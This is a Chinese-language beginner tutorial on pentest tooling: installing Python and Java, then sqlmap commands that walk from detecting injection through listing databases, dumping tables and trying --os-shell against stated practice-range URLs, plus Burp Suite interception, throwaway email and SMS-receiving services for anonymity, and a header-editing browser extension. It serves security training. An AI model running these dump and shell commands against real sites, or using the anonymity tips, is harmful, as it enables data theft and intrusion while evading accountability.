工具安装使用教程
本文内容:
~python、java的安装
~sqlmap的安装
~burpsuite的安装
~渗透测试时,用的匿名邮箱、手机号
~一款修改请求头的谷歌浏览器插件
一、编程语言安装
1,python(建议安装anaconda,这是python的集成环境)
2,Java安装
这两个安装下载教程 网上一大把,建议去百度、谷歌找找。
独立完成安装软件也是能力的一种锻炼。
装到本机就行,不一定非要装虚拟机里
3,环境变量
一般是指在操作系统中用来指定操作系统运行环境的一些参数,如果定义了这个环境变量的路径,
那么当在win系统的变量中寻找不到的时候,就会去我添加的路径去寻找对应的东西
简单理解:就是在cmd运行的时候,输入python或Java时,系统会去找环境变量,找到该路径的解释器
如何添加环境变量? 百度就好了 很简单的步骤
=====工具的核心在于指令
二、工具之sqlmap //需要python环境
1,下载安装:去官方GitHub上下载,解压即可
打开方式:
2,win环境用 cmd到sqlmap的文件路径 python sqlmap.py回车即可
kali下直接打开命令行,输入sqlmap
2+,嫌弃在sqlmap的文件夹打开麻烦,将sqlmap文件路径放到环境变量path中,cmd,sqlmap.py即可
2++,建立cmd快捷方式(位置 C:\Windows\System32) 对此快捷键,右击属性,起始位置改为sqlmap文件夹即可
猫舍靶场:http://59.63.200.79:8003/?id=1
http://59.63.200.79:8014 这个是需要绕狗的进阶靶场
3,实战使用(本人在kali下运行,同学们在win下 稍微改变代码即可)
~sqlmap -u "http://59.63.200.79:8003/?id=1" //遇到东西 就直接回车即可
//探测有没有注入
~sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs
//探测数据库
~sqlmap -u "http://59.63.200.79:8003/?id=1" -D 指定库名字 --tables
//跑指定数据库中的表 不指定库,默认跑当前页面所在库的表
稍微复杂点
~sqlmap -u "http://59.63.200.79:8003/?id=1" -D 库名 -T 指定表名 --columns
//跑指定表中的内容
~sqlmap -u "http://59.63.200.79:8003/?id=1" -D 库名 -T 表名 -C 指定字段名 --dump
//跑出指定字段内容
提一句:--dump是非常敏感的指令,说白了。这就是拖库。已经触碰了法律!!!
简单粗暴点(不太适合挖掘src,当然有授权的情况下无所谓了)
~sqlmap -u "http://59.63.200.79:8003/?id=1" -D 库名 -T 表名 --dump
//跑出表中所有内容
其他指令:
--count 查看表中多少条内容
-v3 列出爆破的详细语句,一般用不到
-delay=1 延时1秒,防止访问过快被ban
--level 1-5 测试等级,默认2,实战中建议3
--is-dba 查询当前用户权限
如果DBA是true,可以拿到shell
但是不一定能拿到
--os-shell 尝试往网站放一个cmdshell(就是拥有cmd权限的shell)
--flush -session 清除缓存!!!重要
三、工具之burpsuite //基于Java环境
1,下载安装:直接谷歌就行(百度应该也可以,建议谷歌)
2,注意浏览器需要设置代理,建议用浏览器插件设置代理,自己百度 谷歌
3,正常仅可以抓http的,(明文的)
可以将burp导出证书 导入到浏览器之中就可以抓https(加密的)
4,日常功能
~抓包,去的包,回来的包
~站内爬虫
~爆破
//这三个是我最常用的,在这里不能细细的展开讲了(太多了)
//有需要的话,私信我,人数较多的话。考虑出图文教程(其实百度、谷歌都有。)
5,抓包软件的本质就是:
设置听你话的中间人,可以拦截从电脑出去的数据和进入的数据,并进行随意修改
四、渗透测试时,用的匿名邮箱
1,bccto.me
2,注册用手机号的话 可以用手机号接码平台
五、浏览器插件的安装
ModHeader(谷歌商店)---修改请求头的插件
pass:有些同学实在找不到怎么安装软件之类的,可以私信给我要 人数较多的话 会考虑出一些详细的教程